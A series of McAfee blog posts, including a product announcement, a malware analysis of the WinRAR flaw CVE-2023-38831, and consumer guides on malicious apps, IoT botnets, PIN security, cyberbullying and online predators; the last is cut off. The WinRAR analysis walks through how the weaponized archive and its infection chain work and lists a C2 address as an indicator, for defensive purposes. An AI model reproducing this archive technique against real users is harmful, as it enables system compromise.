The good news is that we use AI too. And we have for some time to keep you safe. Now, we’ve put AI to use in another powerful way—to put an end to scam texts on your phone. 

Our new McAfee Scam Protection automatically identifies and alerts you if it detects a dangerous URL in your texts. No more wondering if a package delivery message or bank notification is real or not. Our patented AI technology instantaneously detects malicious links to stop you before you click by sending an alert. And as a second line of defense, it can block risky sites if you accidentally follow a scam link in a text, email, social media, and more. 

Stop scam texts and their malicious links.  

The time couldn’t be more right for this kind of protection. Last year, Americans lost $330 million to text scams alone, more than double the previous year, with an average reported loss of $1,000, according to the Federal Trade Commission. The deluge of these new sophisticated AI-generated scams is making it harder than ever to tell what’s real from what’s fake.  

Which is where our use of AI comes in. With it, you can turn the table on scammers and their AI tools.  

Here’s a closer look at how McAfee Scam Protection works: 

• Proactive and automatic protection: Get notifications about a scam text before you even open the message. After you grant permission to scan the URLs in your texts, McAfee Scam Protection takes charge and will let you know which texts aren’t safe and shouldn’t be opened. 
• Patented and powerful AI: McAfee’s AI runs in real-time and is constantly analyzing and processing millions of malicious links from around the world to provide better detection. This means McAfee Scam Protection can protect you from advanced threats including new zero-day threats that haven’t been seen before. McAfee’s AI continually gets smarter to stay ahead of cybercriminals to protect you even better. 
• Simple and easy to use: When you’re set up, McAfee Scam Protection goes to work immediately. No copying or pasting or checking whether a text or email is a scam. We do the work for you and the feature will alert you if it detects a dangerous link and blocks risky sites in real time if you accidentally click.   

How do I get McAfee Scam Protection? 

McAfee Scam Protection is free for most existing customers, and free to try for new customers. 

Most McAfee customers now have McAfee Scam Protection available. Simply update your app. There’s no need to purchase or download anything separately. Set up McAfee Scam Protection in your mobile app, then enable Safe Browsing for extra protection or download our web protection extension for your PC or Mac from the McAfee Protection Center. Some exclusions apply¹. 

For new customers, McAfee Scam Protection is available as part of a free seven-day trial of McAfee Mobile Security. After the trial period, McAfee Mobile Security is $2.99 a month or $29.99 annually for a one-year subscription. 

As part of our new Scam Protection, you can benefit from McAfee’s risky link identification on any platform you use. It can block dangerous links should you accidentally click on one, whether that’s through texts, emails, social media, or a browser. It’s powered by AI as well, and you’ll get it by setting up Safe Browsing on your iOS² or Android device—and by using the WebAdvisor extension on PCs, Macs and iOS. 

Scan the QR code to download McAfee Scam Protection from the Google App store

 Yes, the tables have turned on scammers. 

AI works in your favor. Just as it has for some time now if you’ve used McAfee for your online protection. McAfee Scam Protection takes it to a new level. As scammers use AI to create increasingly sophisticated attacks, McAfee Scam Protection can help you tell what’s real and what’s fake. 

1. Customers currently with McAfee+, McAfee Total Protection, McAfee LiveSafe, and McAfee Mobile Security plans have McAfee Scam Protection included in their subscription.
2. Scam text filtering is coming to iOS devices in October.  

The post Get Yourself AI-powered Scam Protection That Spots and Block Scams in Real Time appeared first on McAfee Blog.

Authored by Neil Tyagi

On 23 August 2023, NIST disclosed a critical RCE vulnerability CVE-2023-38831. It is related to an RCE vulnerability in WinRAR before version 6.23. The issue occurs because a ZIP archive may include a benign file (such as an ordinary .JPG file) and also a folder that has the same name as the harmless file, and the contents of the folder (which may include executable content) are processed during an attempt to access only the benign file.

Our intelligence shows that this vulnerability is being exploited as early as April 2023. Let’s look at a sample exploiting this vulnerability (Hash: bc15b0264244339c002f83e639c328367efb1d7de1b3b7c483a2e2558b115eaa)

• The image below shows that the archive is named trading_system, which hints that it is used to target traders

• We can also see that the threat actor can craft the archive so that folder and file names are the same.
• This is interesting as Windows doesn’t allow files and folders to have the same name in the same path.
• This shows that it was weaponized after creating a regular zip by changing the bytes to make the file and folder name the same.
• Also, note there is a trailing space at the end of the file and folder name (in yellow).
• When we look inside the folder, we see many files, but the most important file is highlighted, which is a bat file containing a malicious script.
• The bat file also has the same name as the benign file outside the folder.

• When we check the script, we see it launches cmd in the minimized state, then goes to the temp folder where WinRAR will extract the files, then tries to find the weakicons.com file, which is present inside the folder and executes it using wmic and then exits.
• Checking weakicons.com we find that it is a CAB SFX file.
• We extract it to check what is inside.
  
• We found a PE file, some ActiveX control objects, and two text files.
• AMD.exe is a visual basic compiled file whose main job is to extract the dll hidden in a blob of data inside pc.txt and execute the ActiveX controls.
• Inside add.txt, we find the registry keys it will try to manipulate
  
• The first control is responsible for registering a COM object in Windows. During registration, registry keys are imported from the “add.txt” file. As a result, a specific COM object with a unique CLSID is registered in the infected system. The default value of the InprocServer32 key is populated with the path to a malicious DLL named “Core.ocx”.
  

• Wmic process executes weakicons.com

• com executes AMD.exe

• AMD.exe extracts the encrypted dll file inside pc.txt and writes it in the romaing\nvidia folder.

• Here, we observe AMD.exe calls reg.exe on registry keys inside add.txt
  
• Timeout is also called to slow down the activities of the infection chain.
  
• AMD.exe Calls rundll32 on the clsid that is registered in the registry

• We can see successful tcp connection to threat actors C2.( ip 37[.]120[.]158[.]229)

Global Heatmap where this vulnerability is being seen in the wild(based on McAfee telemetry data)

Infection chain

How does the vulnerability work?

• Here, we will analyze the issue causing WinRAR to execute the script instead of opening the image.
• We will compare how WinRAR behaves when we execute an image file from a weaponized zip vs. a normal zip. So we fire up ProcMon First.

Normal.zip

Weaponized.zip

• The above image shows that the first logical bug is how WinRAR is extracting files in the temp folder before executing them. In the case of a regular zip, only the clean image file is extracted to the temp folder, whereas in the case of a weaponized zip, even the files present inside the folder are extracted to the temp folder along with the clean image file. This is due to the same file names we have given, which makes WinRAR extract those in temp.
• Verifying the same in the temp folder

Normal Zip

Weaponized Zip

• In Logs, when we dig deep, we can see Winrar searches for our filename with an *, which causes it to iterate over our bat file as it has the same name, which in turn gets executed.

• To see what’s happening under the hood, we hook a debugger and launch WinRAR by manipulating the “image file Execution options” registry key.
  
• When we execute the rar file, we see the debugger getting attached to the winrar process so that we can do just-in-time debugging.
• We put a breakpoint on the ShellExecuteExW function to see what parameters are passed to it just after clicking the jpeg file.
• When we double-click on the image file, we can see the debugger is opened, and after a few clicks, we hit our breakpoint.

Normal zip

• In this case, the correct parameter is passed to the ShellExecuteExW function as the file exists at this exact path.

Weaponized zip

• In this case, an incorrect parameter is passed to the ShellExecuteExW function as the parameter contains a trailing space, and such a file does not exist on the disk.
  
• When we dig deep, we find that later, it calls PathUnquoteSpacesA API call, as per MSDN. It “Removes quotes from the beginning and end of a path.”
• As quotes are removed from the end of the path, ShellExecuteExW executes “simple_image.jpg .cmd” instead of “simple_image.jpg.”

IOC’s

• .( ip 37[.]120[.]158[.]229)
• REG keys

• File path

%APPDATA%\Nvidia\Core.ocx

Recommendations

• WinRAR users should immediately update to the latest version. WinRAR archiver, a powerful tool to process RAR and ZIP files (rarlab.com)
• Use a licensed and updated McAfee+ subscription to stay protected.
• Stay informed about common cyber threats and tactics used by cybercriminals. This knowledge can help you recognize potential risks and avoid scams.
• Be very cautious when dealing with attachments from unknown sources. Only run attachments that come from trusted sources.
• Protect your accounts by using multi-factor authentication.

The post Exploring Winrar Vulnerability (CVE-2023-38831) appeared first on McAfee Blog.

Recently, news broke that over 300,000 Android users downloaded supposed banking apps from the Google Play Store loaded with trojans. These malicious apps managed to outwit the store’s security checkpoints to install malware on the unsuspecting users’ devices. It is more important than ever to stay vigilant about mobile security.

The crafty hackers behind this threat disguised their trojans as commonly searched-for apps, such as QR code scanners, fitness apps, and other popular utilities. The malicious code within these apps is specifically designed to steal banking information, record keystrokes as users enter their account details, and capture screenshots of activities carried out on the phone.

Understanding The Malware Threat

The unique feature of this malware is that it only initiates its harmful activities after being installed. Whether or not the user is aware of the malware’s presence can vary. For the malware to trigger, it needs an additional step, often an in-app update that’s not through the Play Store. This update then downloads the malware payload onto the device. In numerous instances, the counterfeit apps force users into accepting this update once the app is downloaded.

While the apps originally found on the Play Store may not have contained malware in their code, they serve as a delivery system for the payload from other servers after being installed on a user’s device. This discrete method of operation is one of the reasons these harmful apps have managed to escape detection.

The evolving threat highlights the necessity of scrutinizing app permissions and being cautious of in-app prompts, especially if they deviate from the standard update processes provided by reputable app stores. As the malware landscape evolves with increasingly sophisticated tactics, understanding these threats and adopting proactive security measures is crucial for safeguarding the integrity of our digital devices and personal data.

→ Dig Deeper: McAfee 2023 Threat Predictions: Evolution and Exploitation

The Allure of Smartphones to Hackers

Smartphones are enticing targets for hackers. They contain personal information and photos, banking and other payment app credentials, and other valuable data that hackers can exploit. The smartphone’s other features—like cameras, microphones, and GPS—can offer hackers even more invasive capabilities.

Once a smartphone is compromised, a hacker can hijack social media, shopping, and financial accounts; drain wallets by racking up app store purchases or interfering in payment apps; and even read text messages or steal photos. Understanding the nature of these threats, it is essential for users to take protective measures.

→ Dig Deeper: McAfee 2023 Consumer Mobile Threat Report

The Responsibility of App Developers in Ensuring Security 

Mobile applications have become an integral part of our lives, so the responsibility of app developers to ensure security is paramount. Users entrust these apps with their personal information, from contact details to financial data, making it imperative for developers to prioritize security throughout the entire app development process.

One of the primary responsibilities of app developers is to implement secure coding practices. This entails writing code that guards against vulnerabilities and potential exploits. Developers can significantly reduce the risk of security breaches by incorporating measures like robust authentication systems, data encryption, and secure data transmission protocols. Additionally, regular security audits and testing are essential to identify and rectify vulnerabilities promptly.

App developers must also be vigilant when it comes to user data protection. This involves not only securely storing sensitive information but also safeguarding it during transmission. Properly managing app permissions is another key aspect of ensuring user data privacy. Developers should request only the permissions necessary for an app’s core functionality and explain clearly to users why certain permissions are required.

To complete the discussion, app developers play a pivotal role in safeguarding user data and overall digital security. By adhering to secure coding practices, conducting regular security assessments, respecting user privacy, and responding swiftly to vulnerabilities, developers contribute to a safer and more trustworthy mobile app ecosystem. Ultimately, their commitment to security not only protects users but also upholds the integrity of the apps they create.

McAfee Pro Tip: App developers can only protect you if you download their applications from reputable app stores like Google Play and App Store. Downloading third-party applications can increase your risk of getting malware. Know more about third-party apps.

Mechanics of Malicious Apps

How do these harmful apps work? By presenting themselves as legitimate applications, they can sneak onto your phone and gain wide-ranging permissions to access files, photos, and functionalities. Alternatively, they may slip in code that enables hackers to gather personal data. This can result in various issues, from annoying popup ads to the loss of valuable identity information.

Some recent instances of such malicious apps include ad-blocking programs that serve up ads instead, VPN apps that charge subscriptions but provide no protection, and utility apps that misuse system privileges and permissions, further endangering users.

To avoid falling victim to such malicious apps, there are preventive steps you can take.

Seven Steps to Safer Mobile App Downloads

While major app marketplaces like Google Play and Apple’s App Store aim to eradicate malware from their platforms, hackers, being the persistent intruders they are, can find ways around these measures. Hence, extra vigilance on your part is essential. Below are some steps to help fortify your digital security:

1. Scrutinize App Permissions

Be wary of apps asking for unnecessary permissions, like simple games wanting access to your camera or microphone. Read the permissions list before downloading any app. If you find an app asking for more than it should need, it may be a scam. Delete it, and find a legitimate counterpart that doesn’t request for these invasive permissions.

2. Beware of In-App Updates

Apps prompting you for immediate in-app updates can be a red flag. Typically, the app version you download from the store should be the most recent and not require an immediate update. Always update your apps through the app store, not the app itself, to avoid malware attacks.

3. Be Critical When Reviewing Apps

Don’t download without researching the app first. Check the developer’s track record – have they published other apps with many downloads and good reviews? Malicious apps often have few reviews and grammatical errors in their descriptions. Stay alert for these signs.

4. Trust Strong Recommendations

Recommendations from trusted sources or reputable publications are often reliable as these sources have done the vetting for you. This method saves you time and ensures the app’s credibility.

Protecting Your Smartphone Against Malware

5. Avoid Third-Party App Stores

Stick to Google Play and Apple’s App Store, which vet apps for safety and security. Third-party sites might not have a robust review process, and some intentionally host malicious apps. Google and Apple are quick to remove malicious apps once discovered, ensuring an added layer of safety.

6. Install Security Software on your Smartphone

Given the amount of data and information we store on our phones, having security software is just as crucial as having one on our computers and laptops. Whether you opt for comprehensive security software that safeguards all your devices or a specific app from Google Play or Apple’s iOS App Store, you’ll benefit from enhanced malware, web, and device security.

7. Regularly Update Your Phone’s Operating System

Updating your phone’s operating system is as important as installing security software. Updates often contain patches to fix vulnerabilities that hackers exploit to execute malware attacks. Therefore, regular updates are a necessary measure to keep your phone secure.

→ Dig Deeper: How Do I Clear a Virus From My Phone?

Final Thoughts

Staying vigilant and proactive against mobile malware is integral to maintaining your digital security. You can significantly ward off potential threats by scrutinizing app permissions, being wary of in-app updates, critically reviewing apps, trusting strong recommendations, avoiding third-party app stores, installing security software like McAfee Mobile Security, and updating your phone’s OS. Remember, a few moments spent on these precautions are minimal compared to the potential costs and consequences of a hacked phone.

The post Before You Download: Steer Clear of Malicious Android Apps appeared first on McAfee Blog.

The rise in popularity of Internet-connected smart devices has brought about a new era of convenience and functionality for consumers. From Smart TVs and refrigerators to wireless speakers, these devices have transformed the way we live and communicate. However, this advancement in technology is not without its downsides. One of the most notable is the increasing vulnerability to cyber-attacks. In this article, we’ll explore what happened when hundreds of thousands of these devices were roped into an extensive Internet-of-Things (IoT) cyber attack, how it happened, and how you can protect your smart devices to stay safe.

A Brief Background

In what has been termed as the first widespread IoT cyber attack, security researchers discovered that over 100,000 smart home devices were manipulated to form a malicious network. This network, dubbed ‘ThingBot,’ was used to launch a massive phishing campaign, sending out approximately 750,000 spam emails over a two-week period.

The key players in this attack were the smart home appliances that many of us use every day. They range from Smart TVs and refrigerators to wireless speakers, all of which were connected to the internet. The attack signified two key developments: the rise of the IoT phenomenon and the substantial security threats posed by these increasingly connected devices.

→ Dig Deeper: LG Smart TVs Leak Data Without Permission

Internet-of-Things (IoT)

IoT refers to the growing trend of everyday devices becoming more connected to the web. This connection aims to bring added convenience and ease to our daily activities. It ranges from wearable devices like FitBit and Google Glass to smart TVs, thermostats, and computerized cars. While this trend is new and rapidly growing, its implications for security are significant.

The discovery of the IoT botnet in this attack demonstrates just how easily hackers can commandeer these connected smart devices. One would think that security software installed on PCs would provide adequate protection. Unfortunately, that’s not the case. The new generation of connected appliances and wearables does not come with robust security measures. This deficiency is the reason why hackers were able to infect more than 100,000 home devices in a global attack, manipulating these devices to send out their malicious messages.

→ Dig Deeper: The Wearable Future Is Hackable. Here’s What You Need To Know

The Implications for Users

Cybercriminals will continue to exploit the inherent insecurities in the IoT landscape. With the number of connected or “smart” devices projected to increase exponentially in the coming years (reaching an estimated 200 billion IoT devices by 2020). Here’s a list of those implications users can expect: 

• Increased Phishing Threats: Users should be aware that phishing attacks are likely to rise in frequency and sophistication. They may receive deceptive emails or messages designed to trick them into revealing sensitive information or downloading malicious software, posing a significant threat to their personal data and privacy.
• Device Vulnerabilities: Users should recognize that many IoT devices may have inherent security vulnerabilities. These vulnerabilities could be exploited by cybercriminals to gain unauthorized access to these devices, potentially compromising the user’s privacy and security.
• Botnet Formation: Cybercriminals may use unprotected IoT devices to create larger and more powerful botnets. These botnets can be used for various malicious purposes, including launching distributed denial-of-service (DDoS) attacks on websites or networks. Users may unknowingly contribute to these botnets if their devices are compromised.
• Growing IoT Ecosystem: Users should be aware of the rapid growth of the IoT ecosystem, with an expected surge in the number of connected devices. This proliferation means that more devices are susceptible to attacks, making it crucial for users to stay vigilant and take steps to protect their IoT devices.
• Privacy Concerns: Users need to be mindful of the potential invasion of their privacy through IoT devices. These devices often collect and transmit data, and users should carefully review privacy settings and terms of service to understand how their data is used and shared.

Preventive Measures to Secure Your IoT Devices

Prevention and precaution are the best defense against IoT cyber attacks. The first step is to secure your devices with a password. While it may seem simple and obvious, many consumers disregard this step, leaving their devices vulnerable to attacks. Using unique, complex passwords and frequently updating them can help to safeguard against hacking attempts. Furthermore, consider employing two-step verification for devices that offer this feature for additional security.

One must not forget the importance of software updates. Internet-connected devices such as smart TVs and gaming consoles often come with software that needs regular updating. Manufacturers typically release these updates to patch known security vulnerabilities. Hence, whenever there’s an update, it’s wise to install it promptly. It’s also crucial to exercise caution while browsing the internet on these devices. Avoid clicking links from unknown senders and do not fall for deals that appear too good to be true, as these are common phishing tactics.

→ Dig Deeper: Why Software Updates Are So Important

Do Your Due Diligence and Protect Mobile Devices

Before purchasing any IoT device, perform thorough research on the product and the manufacturer. Investigate the company’s security policies and understand the ease with which the product can be updated. In case of any doubts about the security of the device, don’t hesitate to reach out to the manufacturer for clarification. Remember, your security is paramount and deserves this level of attention.

Lastly, it’s vital to protect your mobile devices. Most IoT devices are controlled via smartphones and tablets, making them potential targets for hackers. Ensuring that these devices are secured helps to protect your IoT devices from being compromised. Services like McAfee LiveSafe™ offer comprehensive mobile security that provides real-time protection against mobile viruses, spam, and more, which significantly reduces the chances of a security breach.

McAfee Pro Tip: McAfee LiveSafe doesn’t just protect against mobile viruses. You can safeguard an unlimited number of your personal devices throughout the entire duration of your subscription. So, be sure to connect all your devices for optimal security. 

Final Thoughts

As technology advances and the Internet-of-Things continues to expand, the security challenges associated with it will persist. The first global IoT cyber attack served as a wakeup call for both consumers and manufacturers about the potential security threats that come with the convenience of smart devices. It is essential for individual users to take proactive steps to secure their devices and for manufacturers to continually improve the security features of their products. By working together, we can enjoy the benefits of IoT without compromising our security. And by investing in reliable cybersecurity solutions like McAfee+, Total Protection, and Live Safe, you can enhance your defense against potential attacks and enjoy the benefits of IoT with greater peace of mind.

The post Smart TVs and Refrigerators Used in Internet-of-Things Cyberattack appeared first on McAfee Blog.

Digital technology has dramatically impacted our lives, making it easier and more convenient in many ways. With the use of smartphones, we perform a myriad of activities daily, from making phone calls and sending messages to shopping online and managing bank accounts. While these activities bring convenience, they also expose users to various security threats. Your Android PIN code is a critical aspect that protects your phone data from unauthorized access. But how safe is this four-digit code? This article aims to demystify this question and offers a comprehensive guide on the safety of Android PIN codes.

Understanding the Android PIN Code

A Personal Identification Number (PIN) is a security code used to protect your mobile device from unauthorized access. It is usually a 4-digit number, though some devices allow longer PINs. When you set up a PIN, the device encrypts data and can only be accessed by entering the correct PIN. The idea behind the PIN is that it is easy for you to remember but difficult for others to guess. But is this method of protecting your data foolproof?

 The first line of defense for your smartphone is a simple PIN code. Many users choose easy-to-remember combinations such as “1234” or “1111.” However, these are easily guessable and thus not very secure. Furthermore, a determined thief could try all 10,000 possible four-digit combinations until they hit the right one. This process could be done manually, but it has been demonstrated that it could also be automated with a device like the R2B2 robot, which can try all combinations in less than 24 hours.

R2B2

The R2B2, or Robotic Reconfigurable Button Basher, is a small robot designed with a single, solitary function: to crack any Android four-digit locking code. Justin Engler, a security engineer at iSEC , created itPartners. The R2B2 uses a ‘brute force’ method of entering all 10,000 possible combinations of four-digit passcodes until it finds the right one. It doesn’t use specialized software or malware; it simply inputs combinations until it gets the right one.

Although the chances of your phone falling into the clutches of an R2B2 are slim, such technology raises concerns about the security of a four-digit PIN. If a simple robot can crack the code in less than a day, it questions the efficacy of a four-digit passcode in protecting your mobile data. This emphasizes the need for more robust, more secure forms of password protection.

→ Dig Deeper: Put a PIN on It: Securing Your Mobile Devices

How to Improve Your Android PIN Security?

Even though a four-digit PIN remains one of the most common forms of mobile security, it may not necessarily be the most secure. For times when a PIN code does not offer sufficient protection, alternative security measures can step in. Advanced Android users can access a wide range of security features beyond the conventional four-digit PIN, including patterns, passwords, and biometrics.

• Patterns: Pattern lock screens involve drawing a simple pattern on a grid of nine dots. Although they can be less secure than a four-digit PIN, they offer intuitive and user-friendly options.

• Passwords: Alternatively, some users opt for passwords instead of PINs for added security. Passwords are typically longer and can include a combination of letters, numbers, and special characters, making them more resistant to brute-force attacks. For a more complex option, full passwords can be used. Android supports complex alphanumeric passwords, which can include a mix of upper and lowercase letters, numbers, and symbols. 

→ Dig Deeper: 5 Tips For Creating Bulletproof Passwords

• Biometrics: Biometrics, such as fingerprint or facial recognition, offer the highest level of security and convenience. However, it’s important to note that while convenient, biometric data, if compromised, cannot be easily changed, unlike a PIN or password.

→ Dig Deeper: MasterCard Wants to Verify by Selfies and Fingerprints! The Ripple Effects of Biometric Data?

Additional Security Measures

Beyond passcodes and biometrics, there are a range of additional security measures that can be implemented to protect your phone:

• PIN Length and Complexity: You can enhance the security of your PIN by increasing its length and complexity. Instead of a traditional 4-digit PIN, consider using a longer PIN with more digits. A 6-digit or 8-digit PIN provides significantly more combinations, making it harder for attackers to guess.
• Alphanumeric PINs: Utilize alphanumeric PINs by incorporating both letters and numbers. This increases the complexity of your PIN and makes it more resilient to brute-force attacks. For example, you could use a combination like “P@ssw0rd” as your PIN.
• Customizable PIN: Some Android devices allow you to create custom PINs that are not limited to just digits. You can choose a combination of letters, numbers, and special characters to create a unique and secure PIN.
• Regular PIN Change: To reduce the risk of unauthorized access, change your PIN regularly. This practice can thwart attackers who might have obtained your previous PIN through various means.
• Lock Screen Timeout: Adjust the lock screen timeout settings on your device. This determines how quickly your device locks itself after inactivity. A shorter timeout reduces the window of opportunity for unauthorized access.
• Hidden PIN Entry: Some Android devices offer an option to hide the PIN entry as you type it, making it harder for someone nearby to observe your PIN.
• Lockout Policy: Configure the lockout policy on your device to lock it temporarily after a certain number of failed PIN attempts. This discourages brute-force attacks and unauthorized access.
• Multi-Factor Authentication (MFA): Using more than one form of verification (like 2FA) adds an additional layer of security that makes it harder for unauthorized users to access your device. 
• Device Encryption: Encryption converts data into a format that can only be read with the correct encryption key, making it much harder for anyone who does break your passcode to make sense of your data.
• Remote Wipe: Set up remote wipe capabilities if your device is lost or stolen. This allows you to remotely erase all data on your device to protect your sensitive information.
• Secure Lock Screen Widgets: Disable lock screen widgets that may display sensitive information, as they can potentially leak data even with a secure PIN.
• Security Updates: Keep your device’s operating system and security software up to date. Manufacturers often release security patches to address vulnerabilities, so installing these updates promptly is essential.

McAfee Pro Tip: Refrain from sharing your PIN codes and passwords with anyone. Use a reputable password manager to efficiently and securely manage your collection of passwords and passcodes.

Final Thoughts

While the advent of technology like R2B2 does raise concerns about the sufficiency of a four-digit PIN, this is only part of the story. The landscape of mobile security is variable and complex, and it’s essential to stay vigilant. By using a mix of solid passcodes (or alternative forms of security like biometrics), implementing additional security measures, and regularly updating and reviewing your security settings, you can significantly enhance the security of your Android device. After all, one’s mobile device often holds a wealth of personal information, making its protection a high priority in our increasingly digital world.

The post How Safe Is Your Android PIN Code? appeared first on McAfee Blog.

Unfortunately, cyberbullying has become a prevalent and emerging threat in our digital age. This type of bullying, carried out through computers and similar technologies, including cell phones, often involves harmful or intimidating comments and public posts created with malevolent intent to humiliate the victim. It’s a phenomenon that doesn’t only affect adults but is incredibly common among young people. As a result, it’s crucial to understand how to help your children navigate and mitigate this pervasive, especially now that they can leave digital footprints anywhere and encounter people with bad intentions.

The Uniqueness of Cyberbullying

One of the distinguishing factors of cyberbullying is that, unlike traditional in-person bullying, it doesn’t simply end when the bully is out of sight. Today, bullies can virtually pursue their victims everywhere through technology. This implies that bullying can transpire without the victim’s immediate consciousness, and due to the extensive reach of social media, the bullying can be witnessed by a significantly larger audience than the conventional school playground. 

Bearing in mind the challenges in getting a cyberbully to cease their harmful behavior, the most effective strategy is to educate your children about safe online habits to prevent such situations from arising in the first place. 

→ Dig Deeper: More Dangers of Cyberbullying Emerge—Our Latest Connected Family Report

Types of Cyberbullies

Evolved from the classic schoolyard bullies of old, these cyberbullies can take various forms depending on their attack vector and intent. In fact, there are said to be four types of cyberbullies: the Vengeful Angel, the Power Hungry Cyberbully, Revenge of the Nerds/Inadvertent Cyberbully, and Mean Girls. The Vengeful Angel bullies in order to protect the weak/other victims and often takes action to protect a loved one or friend. The Power Hungry archetype, however, is just a nasty, unkind person who wants to display dominance and control over others. Then there’s the Inadvertent Cyberbully, who are usually the ones getting bullied online or in real life and are typically trying to enact some form of justice or revenge anonymously from the web. Mean Girls are the opposite – and take their online actions in order to impress a group of friends or gain social status.

Cyberbullying Methods

Not only is there a variety in the kinds of bullies across the web, but also many types of cyberbullying techniques these meanies use to bother their victims. First and foremost, there’s harassment, which involves repeated, offensive messages sent to a victim by a bully on some type of online medium. These messages can be rude, personal, and even threatening, with one recent example emerging between two wives of professional hockey players. Similar to harassment is Flaming – an online fight conducted via emails, social media messages, chat rooms, you name it.

Then there are very targeted attacks, named Exclusion and Outing. With Exclusion, cyberbullies select one individual to single out. Exclusion is a popular method, with examples everywhere, from high students in Iowa to well-known celebrities. With Outing, these harassers share private information, photos, and videos of a single person to humiliate them online. There’s also the anonymous angle, AKA Masquerading, where a cyberbully creates a fake online identity to belittle, harass, and degrade their victim – which a nurse in New Zealand was a victim of for a whopping five years.

Cyberbullying Prevention Tips

Parents should inform their children that their online activities will be monitored using parental control software. Explaining how this software works and how it can protect them is essential. This policy should be well established before your child gets their phone or computer. 

Furthermore, parents should discuss cyberbullying with their children and help them understand how it happens. This discussion should take place before your child gets their devices. Before a child gets their own digital devices, they must disclose their passwords to their parents. Parents can reassure them that these passwords will only be used during emergencies. 

Setting Conditions for Device Ownership

A condition set before children get their own digital devices is that they should consent to instructions on smart online habits. Importantly, they must understand that once something is posted online, it stays there forever. 

Another essential guideline for owning a device is that children should be cautious about their personal information. They should be advised not to publicly share their cell phone number and email address and should never disclose their passwords, even to close friends. 

→ Dig Deeper: 8 Signs It May Be Time for Parental Controls

Role-Playing for Cyberbullying

Once your child obtains their digital devices, engaging in role-playing exercises with them is suggested. This allows parents to simulate scenarios where the child might encounter a cyberbully, teaching them appropriate responses. This exercise can also provide a safe space for your child to practice dealing with cyberbullying tactics and learn to act assertively without resorting to aggression or submission. 

In this role-playing activity, parents should encourage their children to report any bullying incidents, even if it is simulated or perceived as insignificant. This activity not only cultivates resilience but also reassures children that they won’t be blamed or punished for being a victim of cyberbullying. 

Maintaining Awareness of Online Activities

Parents must maintain vigilance regarding their child’s internet activities despite all preventive measures. Regular check-ins and encouraging open communication about their online experiences can create a strong bond of trust between parents and children. Assure them they can approach you without fear if they are bullied online. Encourage them to share any suspicious interactions and reassure them that they won’t be in trouble for reporting cyberbullying incidents.

If possible, try to familiarise yourself with the social media platforms that your children are using. Understanding these platforms can provide insight into their online experience and potential risks. Such knowledge can be valuable when initiating discussions about cyberbullying, providing tangible examples and relatable scenarios.

McAfee Pro Tip: Get McAfee’s parental control to safeguard your children against online threats and cyberbullying. With its features, you can actively supervise your kids’ online interactions, establish usage time restrictions, and prevent exposure to inappropriate content. This reassures you that your children can explore the online realm while enjoying a layer of protection. 

Importance of Staying Updated & Educated

Cyberbullying is a complex issue that evolves with the rapid advancements of technology and social media platforms. Therefore, parents must stay updated about the latest forms of cyberbullying and the newest safety settings available on various platforms. Parents should also regularly educate themselves about digital safety and responsible internet usage and share this information with their children to boost their awareness and readiness.

Parents and children can attend webinars, workshops, and seminars about cyberbullying and online safety. Learning together provides a good bonding exercise and ensures that both parties are on the same page. Schools and local community centers often offer resources and programs for cyberbullying awareness and prevention.

→ Dig Deeper: Cyberbullying’s Impact on Both Society and Security

Next Steps for Both Parents and Kids

Typically, cyberbullying is common among teens navigating the trials and tribulations of middle and high school. But that doesn’t mean it’s exclusive to teens, and that doesn’t mean there aren’t steps parents and kids alike can do to stop cyberbullying in its tracks.

If you’re the subject of cyberbullying, the first thing you need to do is block the bully. Then, make sure you collect evidence – take screenshots, print the proof, and do whatever you can to have material to back up your claim. It depends on the type of cyberbullying at work, but you can also use the internet to your advantage and look up relevant resources to aid with your issue.

If you’re a parent, the most important thing is communication. Make yourself available as a resource and remind your kids that they can tell you anything happening in their online world. Beyond that, continuously weave cybersecurity into your family discussions. Remind kids of the simple steps to be safe online, and ensure they know when to flag a cyberbully or online scheme.

There are also technical avenues you can take to protect your kid online. Look into solutions that will help you monitor your family’s online interactions, such as McAfee Safe Family. This solution, for instance, can help you set rules and time limits for apps and websites and see what your kids are up to at a glance. Of course, these solutions are not the be-all and end-all for stopping cyberbullying, but they can help.

Now, there’s still a lot more research that has to be done to understand the cyberbullying problem society is faced with fully. So, as this problem continues to evolve, so must the research, solutions, and regulations that will be created to combat the issue. With the right proactive action, people everywhere can stand up to cyberbullies.

→ Dig Deeper: Cyberbullying – How Parents Can Minimize Impact On Kids

Final Thoughts

In conclusion, cyberbullying is a pressing issue that requires continuous attention and education. By teaching your children what it is and how it happens, setting up rules for responsible device usage, conducting role-play exercises together, and staying informed about their online activities, you can better equip them to navigate the digital world safely. Remember, the ultimate goal is not to control your child’s online activities but to empower them with the tools and understanding necessary to protect themselves online.

The post A Detailed Guide on Cyberbullying appeared first on McAfee Blog.

Despite the extensive media coverage and awareness campaigns, it’s harrowing to admit that children, particularly vulnerable teenagers, are still targeted by online predators. This is not a matter exclusive to the “other” kids – it affects everyone, and young individuals’ innocent and accepting nature often leads them into the dangerous trap of these predators.

As parents, caregivers, and mentors, it’s our responsibility to educate and guide our children about the virtual perils that lurk within their screens. An essential part of this is continuous communication, ensuring they understand the gravity of the situation and can recognize the deceptive tactics employed by these predators.

The Tragic Tale of Nicole Lovell

A heartbreaking example of how these predators operate is the story of Nicole Lovell, a 13-year-old girl who made headlines not long ago. Nicole met David Eisenhauer, an engineering student from Virginia Tech, through the messaging app Kik. Their relations initially seemed harmless, characterized by playful flirtations and shared stories. However, their friendship took a horrific turn when they decided to meet in person, leading to Nicole’s tragic demise. Her body was found shortly after their encounter.

David exhibited no signs of having a ‘dark side,’ an aspect that made their meeting seem all the more innocent. This incident is a stark reminder that anyone can fall prey to such predators, regardless of their background or circumstances. This is why discussing and dissecting such incidents with our children is crucial to teaching them the harsh realities of the digital world.

Recognizing the Traits of Online Predators

Identifying an online predator’s markers is a critical aspect of child safety education. More often than not, these individuals are cunning and mentally unbalanced and spend a significant amount of their time seeking and ‘grooming’ their prospective victims online. The ultimate goal of these predators is to exploit children, either by convincing them to send inappropriate photos or by meeting them in person.

Initiating a continuous dialogue with your children about these predators is crucial. Make them aware of the tactics these individuals employ, such as appearing overly friendly or empathetic. Let them know that predators will go to any length to appear younger and more relatable.

→ Dig Deeper: Reports of Online Predators on the Rise. How to Keep Your Kids Safe

Starting the Conversation with Kids

Addressing such a sensitive issue with your children can be challenging but necessary. Start by discussing cases like Nicole’s, focusing not only on the tragic outcome but also on the lead-up events and why she may have developed such a strong online connection. Discussing how innocent online friendships can spiral into dangerous situations can be an excellent eye-opener for your kids.

